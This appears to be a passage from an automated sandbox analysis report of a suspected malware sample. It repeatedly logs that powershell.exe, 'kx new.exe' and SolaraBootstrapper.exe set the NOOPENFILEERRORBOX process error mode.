Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
